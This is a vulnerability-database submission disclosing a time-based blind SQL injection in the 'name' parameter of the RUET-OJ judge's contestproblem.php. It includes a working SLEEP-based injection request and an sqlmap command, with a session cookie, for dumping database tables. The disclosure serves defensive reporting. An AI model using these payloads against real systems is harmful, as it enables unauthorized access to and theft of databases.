Enviar #674399: shawon100 RUET-OJ BETA 2016 Time Based Blind SQL Injection - contestproblem.phpinformación

Títuloshawon100 RUET-OJ BETA 2016 Time Based Blind SQL Injection - contestproblem.php
DescripciónThere is a Time Based Blind SQL Injection vulnerability in the "name" parameter of the contestproblem.php file, allowing an attacker to dump the entire database. You must be authenticated [POC] With burp proxy: GET /contestproblem.php?name='+AND+(SELECT+1+FROM+(SELECT+SLEEP(5))x)+AND+'1'%3d'1 Automate with sqlmap to perform the database dump. sqlmap -u http://ip/contestproblem.php?name= --cookie=PHPSESSID=f1cc07f2b44446f48035e77e8184cec7 -D reg --tables The person responsible for the application was informed via email on July 25, 2025. But I did not receive a response. Link application: https://github.com/shawon100/RUET-OJ
Usuario
 ManinhuGuitar (UID 84672)
Sumisión2025-10-14 01:40 (hace 6 meses)
Moderación2025-10-27 11:22 (13 days later)
EstadoAceptado
Entrada de VulDB330105 [shawon100 RUET OJ hasta 18fa45b0a669fa1098a0b8fc629cf6856369d9a5 /contestproblem.php Nombre inyección SQL]
Puntos17

AnteriorVisión De ConjuntoPróximo

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!